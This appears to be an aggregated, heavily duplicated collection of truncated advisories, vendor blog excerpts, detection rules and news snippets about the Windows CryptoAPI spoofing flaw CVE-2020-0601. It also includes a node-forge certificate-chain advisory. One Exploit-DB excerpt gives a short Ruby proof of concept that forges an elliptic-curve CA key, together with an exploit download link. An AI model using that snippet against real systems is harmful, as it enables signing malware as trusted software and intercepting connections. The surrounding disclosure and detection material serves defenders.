CVE-2020-0601: A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.An attacker could exploit…

CVE-2026-33896 [HIGH] CWE-295 Forge has a basicConstraints bypass in its certificate chain verification (RFC 5280 violation) Forge has a basicConstraints bypass in its certificate chain verification (RFC 5280 violation) ## Summary `pki.verifyCertificateChain()` does not enforce RFC 5280 basicConstraints requirements when an intermediate certificate lacks both the `basicConstraints` and `keyUsage` extensions. This allows any leaf certificate (without these extensions) to act as a CA and sign other certificates, which node-forge will accept as valid. ## Technical Details In `lib/x509.js`, the `verifyCertificateChain()` function (around lines 3147-3199) has two conditional checks for CA authorization: 1. The `keyUsage` check (which includes a sub-check requiring `basicConstraints` to be present) is gated on `keyUsageExt !== null` 2. The `basicConstraints.cA` check is gated on `bcExt !== null` When a certifica

CVE-2026-33896 [HIGH] Forge has a basicConstraints bypass in its certificate chain verification (RFC 5280 violation) Forge has a basicConstraints bypass in its certificate chain verification (RFC 5280 violation) ## Summary `pki.verifyCertificateChain()` does not enforce RFC 5280 basicConstraints requirements when an intermediate certificate lacks both the `basicConstraints` and `keyUsage` extensions. This allows any leaf certificate (without these extensions) to act as a CA and sign other certificates, which node-forge will accept as valid. ## Technical Details In `lib/x509.js`, the `verifyCertificateChain()` function (around lines 3147-3199) has two conditional checks for CA authorization: 1. The `keyUsage` check (which includes a sub-check requiring `basicConstraints` to be present) is gated on `keyUsageExt !== null` 2. The `basicConstraints.cA` check is gated on `bcExt !== null` When a certifica

CVE-2020-0601 [HIGH] Certificate validation bypass on Windows in crypto/x509 Certificate validation bypass on Windows in crypto/x509 A Windows vulnerability allows attackers to spoof valid certificate chains when the system root store is in use. A workaround is present in Go 1.12.6+ and Go 1.13.7+, but affected users should additionally install the Windows security update to protect their system. See https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0601 for details on the Windows vulnerability.

CVE-2020-0601 [MEDIUM] CWE-295 GHSA-82jc-cv6x-r223: A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32 A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source, aka 'Windows CryptoAPI Spoofing Vulnerability'.

CVE-2020-0601 [HIGH] CWE-295 Microsoft Windows CryptoAPI Spoofing Vulnerability Microsoft Windows CryptoAPI Spoofing Vulnerability Microsoft Windows CryptoAPI (Crypt32.dll) contains a spoofing vulnerability in the way it validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software. The vulnerability is also known under the moniker of CurveBall. Affected: Microsoft Windows Required Action: Apply updates per vendor instructions. Known Ransomware Campaign Use: Known Exploitation References: https://cisa.gov/news-events/c

CVE-2020-0601 [HIGH] CWE-295 Microsoft Windows CryptoAPI Spoofing Vulnerability Vulnerability: Microsoft Windows CryptoAPI Spoofing Vulnerability Affected: Microsoft Windows Microsoft Windows CryptoAPI (Crypt32.dll) contains a spoofing vulnerability in the way it validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software. The vulnerability is also known under the moniker of CurveBall. Required Action: Apply updates per vendor instructions. Notes: Reference CISA's ED 20-02 (https://www.cisa.gov/news-events/directives/e

CVE-2020-6380 [HIGH] Stable Channel Update for Desktop: CVE-2020-6380 Stable Channel Update for Desktop CVE-2020-6380: Extension message verification error. Reported by Sergei Glazunov of Google Project Zero on 2019-12-09 [$N/A][ 1040772 ] High N/A: Protections to mitigate Windows ECC certificate validation vulnerability CVE-2020-0601 Severity: high

CVE-2020-0601 [HIGH] Windows CryptoAPI Spoofing Vulnerability Windows CryptoAPI Spoofing Vulnerability Description: A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software. The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates

CVE-2020-0601 [HIGH] Audit CVE Event Audit CVE Event Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log. Detection: condition: selection selection: EventID: 1 Provider_Name: - Microsoft-Windows-Audit-CVE - Audit-CVE Log Source: product: windows service: application

CVE-2020-0601 [HIGH] Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601 - CurveBall) Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601 - CurveBall) A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. Query: event.provider:"Microsoft-Windows-Audit-CVE" and message:"[CVE-2020-0601]" and host.os.type:windows

CVE-2020-0601 Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate --- # EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47933.zip require 'openssl' raw = File.read "ca.crt" ca_cert = OpenSSL::X509::Certificate.new(raw) # Parse public key from CA ca_key = ca_cert.public_key if !(ca_key.instance_of? OpenSSL::PKey::EC) then puts "CA NOT ECC" puts "Type: " + key.inspect exit end # Set new group with fake generator G = Q ca_key.private_key = 1 group = ca_key.group group.set_generator(ca_key.public_key, group.order, group.cofactor) group.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE ca_key.group = group puts ca_key.to_pem

Privilege elevation exploits used in over 50% of insider attacks ## Privilege elevation exploits used in over 50% of insider attacks ## Bill Toulas Elevation of privilege flaws are the most common vulnerability leveraged by corporate insiders when conducting unauthorized activities on networks, whether for malicious purposes or by downloading risky tools in a dangerous manner. A report by Crowdstrike based on data gathered between January 2021 and April 2023 shows that insider threats are on the rise and that using privilege escalation flaws is a significant component of unauthorized activity. According to the report, 55% of insider threats logged by the company rely on privilege escalation exploits, while the remaining 45% unwittingly introduce risks by downloading or misusing offensive tools. Rogue insiders typically turn against their employer b

Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition) ## Table of Contents Top Ten Vulnerabilities Exploited by Threat Actors Top Ten Highly Active Threat Actors Top Ten Most Exploited Vulnerabilities by Malware Top Ten Most Active Malware Top Ten Vulnerabilities Exploited by Ransomware Prioritizing Exploited Vulnerabilities with TheQualys VMDR and TruRisk Assess Your Organizations Exposure to Risk / TruRisk Dashboard Key Insights & Takeaways References Additional Contributor The previous blog from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) of

Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys #### Table of Contents - Situation - Directive Scope - CISA Catalog of Known Exploited Vulnerabilities - Detect CISA Vulnerabilities Using Qualys VMDR - CISA Exploited RTI - Detailed Operational Dashboard - Remediation - Federal Enterprises and Agencies Can Act Now - Summary - Getting Started CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively. ## Situation Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv

Qualys Response to CISA Alert: Binding Operational Directive 22-01 ## Table of Contents Overview Directive Scope CISA Catalog of Known Exploited Vulnerabilities Detect CISAs Vulnerabilities Using Qualys VMDR Remediation Federal Enterprises and Agencies Can Act Now Summary Getting Started Start your VMDR 30-day, no-cost trial today ## Overview On November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directive 22-01 , “Reducing the Significant Risk of Known Exploited Vulnerabilities.” This directive recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate

Qualys Response to CISA Alert: Binding Operational Directive 22-01 | Qualys #### Table of Contents - Overview - Directive Scope - CISA Catalog of Known Exploited Vulnerabilities - Detect CISAs Vulnerabilities Using Qualys VMDR - Remediation - Federal Enterprises and Agencies Can Act Now - Summary - Getting Started Start your VMDR 30-day, no-cost trial today ## Overview On November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directive 22-01, “Reducing the Significant Risk of Known Exploited Vulnerabilities.” This directive recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to

Manage Zero Day Exploits (ZDI) with Trend Micro Solutions Cyberbedrohungen ## How Trend Micro Helps Manage Exploited Vulnerabilities As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible. By: Jon Clay Apr 28, 2021 Read time: ( words) Save to Folio As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabili

Manage Zero Day Exploits (ZDI) with Trend Micro Solutions Cyber Threats ## How Trend Micro Helps Manage Exploited Vulnerabilities As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible. By: Jon Clay 2021/04/28 Read time: ( words) Save to Folio As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabilities

Manage Zero Day Exploits (ZDI) with Trend Micro Solutions Minacce cyber ## How Trend Micro Helps Manage Exploited Vulnerabilities As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible. By: Jon Clay Apr 28, 2021 Read time: ( words) Save to Folio As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabilitie

Manage Zero Day Exploits (ZDI) with Trend Micro Solutions Ciberamenazas ## How Trend Micro Helps Manage Exploited Vulnerabilities As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible. By: Jon Clay Apr 28, 2021 Read time: ( words) Save to Folio As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabilitie

Manage Zero Day Exploits (ZDI) with Trend Micro Solutions Cyber Threats ## How Trend Micro Helps Manage Exploited Vulnerabilities As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible. By: Jon Clay Apr 28, 2021 Read time: ( words) Save to Folio As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabilitie

Manage Zero Day Exploits (ZDI) with Trend Micro Solutions Cyber Threats # How Trend Micro Helps Manage Exploited Vulnerabilities As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible. By: Jon Clay 2021/04/28 Read time: ( words) Save to Folio Photo credit: pxhere As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands o

[CRITICAL] CVE-2020-4006: VMware Command Injection Flaw Exploited by Russian State-Sponsored Threat Actors ## Cloud Exposure Tenable Cloud Security (CNAPP) Request a demo Tenable Cloud Vulnerability Management Request a demo Tenable CIEM Request a demo Secure your cloud ## Vulnerability Exposure Tenable Vulnerability Management Try for free Tenable Security Center Request a demo Tenable Web App Scanning Try for free Tenable Patch Management Request a demo Tenable Enclave Security Request a demo Tenable Attack Surface Management Request a demo Tenable Nessus Try for free ## AI Exposure Tenable AI Exposure Request a demo ## OT/IoT Exposure Tenable OT Security Request a demo ## Identity Exposure Tenable Identity Exposure Request a demo ## Business needs Active Directory AI Security Posture Management (AI-SPM) AWS security Azure security Cloud Security Posture Man

Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities ## Cloud Exposure Tenable Cloud Security (CNAPP) Request a demo Tenable Cloud Vulnerability Management Request a demo Tenable CIEM Request a demo Secure your cloud ## Vulnerability Exposure Tenable Vulnerability Management Try for free Tenable Security Center Request a demo Tenable Web App Scanning Try for free Tenable Patch Management Request a demo Tenable Enclave Security Request a demo Tenable Attack Surface Management Request a demo Tenable Nessus Try for free ## AI Exposure Tenable AI Exposure Request a demo ## OT/IoT Exposure Tenable OT Security Request a demo ## Identity Exposure Tenable Identity Exposure Request a demo ## Business needs Active Directory AI Security Posture Management (AI-SPM) AWS security Azure security Cloud Security Posture Man

CVE-2020-15505 [CRITICAL] NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities | Qualys #### Table of Contents - Detect 25 Publicly Known Vulnerabilities using VMDR Update November 25, 2020: The UK National Cyber Security Centre alerts that APT nation-state groups and cybercriminals are exploiting MobileIron RCE vulnerability (CVE-2020-15505). Original post: On October 20, 2020, the United States National Security Agency (NSA) released a cybersecurity advisory on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations. “Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and mitigation efforts,” said the NSA advisory. It also recommended “crit

CVE-2020-15505 [CRITICAL] NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities ## Table of Contents Detect 25 Publicly Known Vulnerabilities using VMDR Update November 25, 2020 : The UK National Cyber Security Centre alerts that APT nation-state groups and cybercriminals are exploiting MobileIron RCE vulnerability (CVE-2020-15505). Original post : On October 20, 2020, the United States National Security Agency (NSA) released a cybersecurity advisory on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations. “Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and mitigation efforts,” said the NSA advisory. It also recommended “critic

CVE-2020-0796 [HIGH] CVE-2020-0796 Memory Corruption Vulnerability in Windows 10 SMB Server | FortiGuard Labs FORTIGUARD LABS THREAT RESEARCH CVE-2020-0796 Memory Corruption Vulnerability in Windows 10 SMB Server By Yijie Wang | March 12, 2020 FortiGuard Labs Threat Analysis Report Affected platforms: Windows 10 Impacted parties: All Windows users Impact: An unauthenticated attacker can exploit this wormable vulnerability to cause memory corruption, which may lead to remote code execution. Severity level: High Solution: All Windows 10 users are urged to apply the patch for CVE-2020-0796 Introduction Microsoft recently released a patch for CVE-2020-0796, a critical SMB server vulnerability that affects Windows 10. An unauthenticated attacker can exploit this vulnerability to cause memory corruption, which may lead to remote code execution. This SMB vulnerability also has the potential to

CVE-2020-0601 [HIGH] A Technical Analysis of CurveBall (CVE-2020-0601) ## A Technical Analysis of CurveBall (CVE-2020-0601) A code-level root cause analysis of CVE-2020-0601 in the context of how applications are likely to use CryptoAPI to handle certificates — more specifically in the context of applications communicating via Transport Layer Security (TLS). By: John Simpson Feb 13, 2020 Read time: ( words) Save to Folio The first Microsoft patch Tuesday of 2020 contained fixes for CVE-2020-0601 , a vulnerability discovered by the United States’ National Security Agency (NSA) that affects how cryptographic certificates are verified by one of the core cryptography libraries in Windows that make up part of the CryptoAPI system. Dubbed CurveBall or “Chain of Fools,” an attacker exploiting this vulnerability could potentially create their own cryptographic ce

CVE-2020-0601 [HIGH] A Technical Analysis of CurveBall (CVE-2020-0601) # A Technical Analysis of CurveBall (CVE-2020-0601) A code-level root cause analysis of CVE-2020-0601 in the context of how applications are likely to use CryptoAPI to handle certificates — more specifically in the context of applications communicating via Transport Layer Security (TLS). By: John Simpson 2020/02/13 Read time: ( words) Save to Folio The first Microsoft patch Tuesday of 2020 contained fixes for CVE-2020-0601, a vulnerability discovered by the United States’ National Security Agency (NSA) that affects how cryptographic certificates are verified by one of the core cryptography libraries in Windows that make up part of the CryptoAPI system. Dubbed CurveBall or “Chain of Fools,” an attacker exploiting this vulnerability could potentially create their own cryptographic certi

CVE-2020-0601 [HIGH] A Technical Analysis of CurveBall (CVE-2020-0601) ## A Technical Analysis of CurveBall (CVE-2020-0601) A code-level root cause analysis of CVE-2020-0601 in the context of how applications are likely to use CryptoAPI to handle certificates — more specifically in the context of applications communicating via Transport Layer Security (TLS). By: John Simpson 2020/02/13 Read time: ( words) Save to Folio The first Microsoft patch Tuesday of 2020 contained fixes for CVE-2020-0601 , a vulnerability discovered by the United States’ National Security Agency (NSA) that affects how cryptographic certificates are verified by one of the core cryptography libraries in Windows that make up part of the CryptoAPI system. Dubbed CurveBall or “Chain of Fools,” an attacker exploiting this vulnerability could potentially create their own cryptographic cert

[HIGH] Trend Micro Creates Factory Honeypot to Trap Attackers Exploits & Vulnerabilities # Trend Micro Creates Factory Honeypot to Trap Attackers Dive into a research study that explores the risks associated with common cybersecurity vulnerabilities in a factory setting. Also, misconfigured Microsoft cloud databases containing 14 years of customer support logs exposed 250 million records. By: Jon Clay 2020/01/24 Read time: ( words) Save to Folio Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, dive into a research study that explores the risks associated with common cybersecurity vulnerabilities in a factory setting. Also, read about how misconfigured Microsoft cloud databases containing 14 years of customer support logs exposed 250 milli

WEF Report: Cyberattacks Rank Just Below Climate Change as an Existential Threat ## Cloud Exposure Tenable Cloud Security (CNAPP) Request a demo Tenable Cloud Vulnerability Management Request a demo Tenable CIEM Request a demo Secure your cloud ## Vulnerability Exposure Tenable Vulnerability Management Try for free Tenable Security Center Request a demo Tenable Web App Scanning Try for free Tenable Patch Management Request a demo Tenable Enclave Security Request a demo Tenable Attack Surface Management Request a demo Tenable Nessus Try for free ## AI Exposure Tenable AI Exposure Request a demo ## OT/IoT Exposure Tenable OT Security Request a demo ## Identity Exposure Tenable Identity Exposure Request a demo ## Business needs Active Directory AI Security Posture Management (AI-SPM) AWS security Azure security Cloud Security Posture Man

The Curveball Vulnerability Research Analysis | FortiGuard Labs FORTIGUARD LABS THREAT RESEARCH The Curveball Vulnerability Research Analysis By Udi Yavo | January 21, 2020 Introduction to Curveball Exploits On patch Tuesday for January 2020, Microsoft disclosed a critical vulnerability that had been discovered by the NSA, that has been dubbed CurveBall or ChainOfFools by the security research community. This vulnerability affects Windows 10, Windows 2016, and the 2019 version of the crypt32.dll that implements Windows’ CryptoAPI. This vulnerability can be exploited by a malicious actor to spoof certificates in a way that will trick any software that leverages Windows CryptoAPI for signature validation into believing it is legitimate. For example, ransomware authors can trick Windows into believing that their samples have been signed by Microsoft.

CVE-2020-0601 20th January – Threat Intelligence Bulletin Latest Publications CPR Podcast Channel AI Research Web 3.0 Security Intelligence Reports ThreatCloud AI Threat Intelligence & Research Zero Day Protection Sandblast File Analysis About Us SUBSCRIBE 2026 2025 2024 2023 2022 2021 2020 2019 2018 2017 2016 ## 20th January – Threat Intelligence Bulletin For the latest discoveries in cyber research for the week of 20th January 2020, please download our Threat Intelligence Bulletin . Top Attacks and Breaches Hackers have stolen personal information in an attack on the Australian P&N bank. The attack focused on the bank’s CRM system that stored a great deal of sensitive personal and financial information. Australia has also experienced a data breach of a bushfire donation site – Hackers abused the outdated Magneto CMS u

Patch Tuesday, January 2020 Edition Microsoft today released updates to plug 50 security holes in various flavors of Windows and related software. The patch batch includes a fix for a flaw in Windows 10 and server equivalents of this operating system that prompted an unprecedented public warning from the U.S. National Security Agency. This month also marks the end of mainstream support for Windows 7, a still broadly-used operating system that will no longer be supplied with security updates. An advisory (PDF) released today by the NSA says the flaw may have far more wide-ranging security implications, noting that the “exploitation of the vulnerability allows attackers to defeat trusted network connections and deliver executable code while appearing as legitimately trusted entities.” “NSA assesses the vulnerability to be se

CVE-2020-0601 [HIGH] Free tool to patch against Vulnerability CVE-2020-0601 ## Free tool to patch against Vulnerability CVE-2020-0601 The best protection against this very serious vulnerability is to ensure the affected systems are patched with Microsoft’s latest security update. By: Trend Micro Jan 17, 2020 Read time: ( words) Save to Folio So much for a quiet January! By now you must have heard about the new Microsoft® vulnerability CVE-2020-0601, first disclosed by the NSA (making it the first Windows bug publicly attributed to the National Security Agency). This vulnerability is found in a cryptographic component that has a range of functions—an important one being the ability to digitally sign software, which certifies that the software has not been tampered with. Using this vulnerability, attackers can sign malicious executables to make them look legitim

CVE-2020-0601 [HIGH] Threat Brief: Windows CryptoAPI Spoofing Vulnerability CVE-2020-0601 ## Executive Summary In January 2020, during the first Patch Tuesday of the new year, Microsoft released patches for 17 new vulnerabilities including one for CVE-2020-0601 known as Curveball. The vulnerability exists in the Windows CryptoAPI (Crypt32.dll) and specifically relates to the method used for Elliptic Curve Cryptography (ECC) certificate validation. At the time of release, Microsoft affirmed that they had not yet seen the vulnerability exploited in the wild (ITW). Researcher Tal Be’ery released a blog titled “Win 10 Crypto Vulnerability: Cheating in Elliptic Curve Billiard 2” that does a fantastic job at explaining this bug. ### Mitigation Actions The patch provided by Microsoft included the typical release of operating system patches, but this time a new Application Programmi

CVE-2020-0601 [HIGH] Free tool to patch against Vulnerability CVE-2020-0601 ## Free tool to patch against Vulnerability CVE-2020-0601 The best protection against this very serious vulnerability is to ensure the affected systems are patched with Microsoft’s latest security update. By: Trend Micro 2020/01/17 Read time: ( words) Save to Folio So much for a quiet January! By now you must have heard about the new Microsoft® vulnerability CVE-2020-0601, first disclosed by the NSA (making it the first Windows bug publicly attributed to the National Security Agency). This vulnerability is found in a cryptographic component that has a range of functions—an important one being the ability to digitally sign software, which certifies that the software has not been tampered with. Using this vulnerability, attackers can sign malicious executables to make them look legitimat

CVE-2020-0601 [HIGH] Free tool to patch against Vulnerability CVE-2020-0601 # Free tool to patch against Vulnerability CVE-2020-0601 The best protection against this very serious vulnerability is to ensure the affected systems are patched with Microsoft’s latest security update. By: Trend Micro 2020/01/17 Read time: ( words) Save to Folio So much for a quiet January! By now you must have heard about the new Microsoft® vulnerability CVE-2020-0601, first disclosed by the NSA (making it the first Windows bug publicly attributed to the National Security Agency). This vulnerability is found in a cryptographic component that has a range of functions—an important one being the ability to digitally sign software, which certifies that the software has not been tampered with. Using this vulnerability, attackers can sign malicious executables to make them look legitimat

CVE-2020-0601 [HIGH] Threat Brief: Windows CryptoAPI Spoofing Vulnerability CVE-2020-0601 Threat Research Center High Profile Threats Vulnerabilities ## Threat Brief: Windows CryptoAPI Spoofing Vulnerability CVE-2020-0601 Brandon Young Mike Harbison Published: January 17, 2020 High Profile Threats Vulnerabilities Curveball CVE-2020-0601 Microsoft Vulnerability ## Executive Summary In January 2020, during the first Patch Tuesday of the new year, Microsoft released patches for 17 new vulnerabilities including one for CVE-2020-0601 known as Curveball. The vulnerability exists in the Windows CryptoAPI (Crypt32.dll) and specifically relates to the method used for Elliptic Curve Cryptography (ECC) certificate validation. At the time of release, Microsoft affirmed that they had not yet seen the vulnerability exploited in the wild (ITW). Researcher Tal Be’ery released

CVE-2020-0601 [HIGH] Free tool to patch against Vulnerability CVE-2020-0601 Exploits & Vulnerabilities ## Free tool to patch against Vulnerability CVE-2020-0601 The best protection against this very serious vulnerability is to ensure the affected systems are patched with Microsoft’s latest security update. By: Trend Micro Jan 17, 2020 Read time: ( words) Save to Folio So much for a quiet January! By now you must have heard about the new Microsoft® vulnerability CVE-2020-0601, first disclosed by the NSA (making it the first Windows bug publicly attributed to the National Security Agency). This vulnerability is found in a cryptographic component that has a range of functions—an important one being the ability to digitally sign software, which certifies that the software has not been tampered with. Using this vulnerability, attackers can sign malicious executabl

CVE-2020-0601 [HIGH] Öffentlicher PoC für kritischen Microsoft-NSA Fehler Ausnutzung von Schwachstellen ## Öffentlicher PoC für kritischen Microsoft-NSA Fehler Sicherheitsforscher haben Proof-of-Concept Code veröffentlicht für die Ausnutzug von CurveBall (CVE-2020-0601). Es ist die erste Sicherheitslücke, die die National Security Agency (NSA) gemeldet hatte. By: Trend Micro Jan 17, 2020 Read time: ( words) Save to Folio von Trend Micro Die Sicherheitsforscher Saleem Rashid , Kudelski Security und Ollypwn haben Proof-of-Concept Code veröffentlicht für die Ausnutzug von CurveBall ( CVE-2020-0601 ). Es ist die erste Sicherheitslücke, die die National Security Agency (NSA) gemeldet hatte. Die Lücke ist im ersten Zyklus 2020 der Patch Tuesday -Updates berücksichtigt worden und betrifft die Validierung des CryptoAPIs der Elliptic Curve Cryptography (ECC)-Zertif

Threat Source newsletter (Jan. 16, 2019) Newsletter compiled by Jon Munshaw. Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week. This wasn’t your average Patch Tuesday. Microsoft’s monthly security update was notable for a few reasons. For starters, it’s really time to give up Windows 7, since this is the last free update Microsoft will issue for the operating system. There was also a vulnerability that made headlines for leaving Windows open to cryptographic spoofing, which could allow an attacker to sign a malicious file as if it came from a trusted source. The bug was so severe that Microsoft even reached out to the U.S. military ahead of time to issue them an early patch. For more on Patch Tuesday, you can check out our roundup here and our Snort rule

CVE-2020-0601 [HIGH] Addressing Microsoft’s January 2020 Security Update for CVE-2020-0601 FORTIGUARD LABS THREAT RESEARCH Addressing Microsoft’s January 2020 Security Update for CVE-2020-0601 By FortiGuard SE Team | January 15, 2020 Microsoft’s Security Updates for January 2020 (commonly known as Patch Tuesday) were released to the public on January 14. On Monday there were rumblings across the Twittersphere that a high profile vulnerability would be addressed in today’s Patch Tuesday update. And in their cumulative update, Microsoft addressed 50 CVEs, along with one notable vulnerability – CVE-2020-0601 (CryptoAPI Spoofing Vulnerability). CVE-2020-0601 Details First discovered by The US National Security Agency (NSA) and disclosed to Microsoft, CVE-2020-0601 is a spoofing vulnerability which exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptog

[CRITICAL] January Patch Tuesday: IE, RDP, Crypto Bugs Updates ## January Patch Tuesday: IE, RDP, Crypto Bugs Updates Microsoft released 49 patches in this cycle, eight of which are classifed Critical and the remaining 41 as Important. The fixes address a range of products, including RDP Gateway servers, Internet Explorer, CryptoAPI, Office, and OneDrive. By: Trend Micro 2020/01/15 Read time: ( words) Save to Folio 2020 starts off with a relatively heavy list of patches for Microsoft users. January is typically a light month for fixes, but Microsoft released patches for 49 vulnerabilities (eight of which are Critical and all the remaining classified as Important) in this cycle. None of these vulnerabilities are known to be under attack at this time. The listed vulnerabilities covered a range of Microsoft products including Windows RDP Gateway ser

[HIGH] Patch Tuesday, January 2020 Edition Microsoft today released updates to plug 50 security holes in various flavors of Windows and related software. The patch batch includes a fix for a flaw in Windows 10 and server equivalents of this operating system that prompted an unprecedented public warning from the U.S. National Security Agency . This month also marks the end of mainstream support for Windows 7 , a still broadly-used operating system that will no longer be supplied with security updates. As first reported Monday by KrebsOnSecurity, Microsoft addressed a severe bug ( CVE-2020-0601 ) in Windows 10 and Windows Server 2016/19 reported by the NSA that allows an attacker to spoof the digital signature tied to a specific piece of software. Such a weakness could be abused by attackers to make malware appear to be a benign pro

[CRITICAL] January Patch Tuesday: IE, RDP, Crypto Bugs Updates ## January Patch Tuesday: IE, RDP, Crypto Bugs Updates Microsoft released 49 patches in this cycle, eight of which are classifed Critical and the remaining 41 as Important. The fixes address a range of products, including RDP Gateway servers, Internet Explorer, CryptoAPI, Office, and OneDrive. By: Trend Micro Jan 15, 2020 Read time: ( words) Save to Folio 2020 starts off with a relatively heavy list of patches for Microsoft users. January is typically a light month for fixes, but Microsoft released patches for 49 vulnerabilities (eight of which are Critical and all the remaining classified as Important) in this cycle. None of these vulnerabilities are known to be under attack at this time. The listed vulnerabilities covered a range of Microsoft products including Windows RDP Gateway s

